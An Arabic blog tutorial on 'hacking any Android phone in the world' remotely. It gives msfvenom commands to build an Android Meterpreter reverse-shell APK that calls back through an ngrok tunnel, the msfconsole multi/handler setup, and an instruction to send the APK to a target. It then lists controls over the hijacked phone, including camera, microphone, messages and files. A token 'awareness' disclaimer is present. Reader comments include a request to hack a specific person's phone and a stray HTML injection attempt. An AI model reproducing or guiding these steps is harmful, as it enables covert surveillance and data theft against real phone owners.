recent
أخبار ساخنة

اختراق أي جوال أندرويد حول العالم ( اختراق خارجي )

اختبار اختراق أي جوال أندرويد حول العالم ( اختراق خارجي )




السلام عليكم و أهلاً وسهلاً بكم من جديد في موقع القرصان الإلكتروني للتعليم ، سنشرح اليوم كيفية  اختراق أي هاتف يعمل بنظام الأندرويد أين ما كان  أي اختراق خارجي او كما يعرف اختراق الاندرويد خارج الشبكة ، و سنتعلم كيفية ضبط ذلك من خلال أداة انجروك بدلأً من وضع الـ IP الأساسي  و سنطبق الاختراق اليوم عن طريق كالي لينكس و سنقوم باستهداف جهاز على شبكة أخرى وذلك  من خلال تطبيق البايلود الذي سنقوم بإنشائه من داخل ميتاسبلويت . 

تحذير : هذا الشرح من باب التوعية الأمنية الإلكترونية و كل المواد المذكورة فيه هي فقط بهدف الحماية ولا يسمح باستخدامه في أشياء ضارة ولسنا مسؤولين عن أي شيء غير قانوني  .

اختراق الاندرويد خارج الشبكة

يعتبر اختراق الاندرويد خارج الشبكة من التقنيات التي لا يستطيع معرفتها سوى الهكر الحقيقي أو المحترف ، و السبب في ذلك لأن الاختراق الخارجي هو عبارة عن اختراق جوال ما يتواجد في شبكة مختلفة عن الشبكة التي تتصل بها أو الراوتر ، مثل بأن تكون أنت في دولة و الجوال المستهدف في دولة أخرى ، فحينها سوف تحتاج الى استخدام اختراق خارجي حتى تتمكن من الوصول الى جهاز الأندرويد و اختراق الهاتف بالكامل عن بعد  .

اختراق خارجي metasploit

من أكثر الأدوات استخداماً في القرصنة و الاختراق الخارجي هي أداة ميتاسبلويت metasploit ، فمن خلالها يمكن تنفيذ الإختراق الخارجي عبر بايلود و قرصنة هاتف الاندرويد خارج الشبكة ، و نحن اليوم بصدد تنفيذ اختراق خارجي على جوال أندرويد يتواجد خارج الشبكة التي نتصل عليها و سنقوم باختراقه عبر payload ميتاسبلويت اختراقاً خارجياً ، بالاستعانة بأداة ngrok نجروك  ، لتثبيت الip و port او المنفذ . 

اختبار اختراق الأندرويد عبر كالي لينكس خارج الشبكة 

جميعنا يعرف قوة نظام kali linux وما يمكن فعله باستخدامه ، و اليوم سنقوم باختبار اختراق اي جوال حول العالم باستخدامه و ذلك من خلال ارسال تطبيق بايلود الى الاندرويد و تثبيت الجلسة حتى لا تضيع منا ، و سنتعلم بعض الاوامر التي سنستطيع من خلالها التحكم في الهاتف بالكامل ، وكل هذا اختراق خارجي للاندرويد . 

تجهيز اداة ngrok

لكي نبدأ في اختبار اختراق الأندرويد خارج الشبكة عبر ميتاسبلويت ، لا بد علينا أولاً من تثبيت و فتح بورت ، و لمعرفة كيفية تثبيت الأداة راجع الشرح السابق ما هي أداة Ngrok و شرح التثبيت على ترمكس و حل مشكلة عدم الاتصال .

بعد ذلك قم بفتح بورت مخصص بالأداة . 

إنشاء بايلود في ميتاسبلويت 

بعد تجهيز البورت ، سنحتاج الى إنشاء الحمولة التي سنستهدف بها هاتف الأندرويد المتواجد خارج نطاق شبكتنا ، و ذلك باستخدام ميتاسبلويت عبر الأمر التالي : 
msfvenom -p android/meterpreter/reverse_tcp LHOST='هنا ضع الرابط من الأدة' LPORT='هنا ضع البورت من الأداة ' R > Desktop/Payload.apk

ثم بعد الإنتهاء ، قم بفتح تيرمنال جديدة و قم بتشغيل Metasploit بالأمر : 

msfconsole
use exploit /multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT واكتب البورت الذي فتحته في الأداة
exploit
و الآن أرسل التطبيق الى الهدف و إبدأ في اختبار الاختراق للأندرويد خارجياً . 

أوامر التحكم في الأندرويد خارج الشبكة 

هناك الكثير من الأوامر التي تستطيع التحكم بها في الجهاز بعد اختراقها ، و لمعرفة ما هي هذه الأوامر يمكنك كتابة اشارة استفهام و ستعرض لك جميع الأوامر مثل التحكم بالكاميرا و المايكروفون و سحب الرسائل و الصور و الملفات و أوامر معرفة التطبيقات المثبتة و تثبيت جديد أو إزالة ،  أو حتى التحقق من إذا كان الهاتف يحتوي على روت أم لا و الكثيرمن الأوامر ، و يمكنك الرجوع الى الشرح السابق و التعرف على بعض الأوامر كيفية اختبار اختراق الاندرويد بالميتاسبلويت من ترمكس داخلياً .

شرح اختبار اختراق الأندرويد خارج الشبكة بالفيديو

وفي النهاية كان هذا كل شيء عن اختبار اختراق الأندرويد عبر الشبكة الخارجية ، فإذا رأيت الموضوع مهم بالنسبة لك و لغيرك أرسله لأصدقائك لعلهم يستفيدون منه ، و شكراً لك و يوماً سعيداً . 


author-img
Ammar Ahmad

تعليقات

9 تعليقات
إرسال تعليق
  • غير معرف23 أكتوبر 2022 في 6:20 ص

    كذب كذب

    حذف التعليق
    • غير معرف27 أبريل 2023 في 8:36 م

      exploit dosent work

      حذف التعليق
      • غير معرف18 مايو 2023 في 10:20 ص

        فيه واحد ماخذ صور لي ، اعرف رقم جواله وحسابه في التيك توك ، فيه طريقة اخترق جواله عن بعد ، لو أرسله صورة أو رابط راح يفتح بس برنامج صعب

        حذف التعليق
        • غير معرف2 يونيو 2023 في 11:28 ص

          <hsbz

          حذف التعليق
          • غير معرف2 يونيو 2023 في 11:29 ص

            حذف التعليق
            • غير معرف2 يونيو 2023 في 11:31 ص

              حذف التعليق
              • غير معرف2 يونيو 2023 في 11:32 ص

                aaaa

                حذف التعليق
                • غير معرف2 يونيو 2023 في 11:34 ص

                  hshs

                  حذف التعليق
                  • غير معرف2 يونيو 2023 في 11:34 ص

                    <b style="color:red;>hshsh

                    حذف التعليق
                    google-playkhamsatmostaqltradent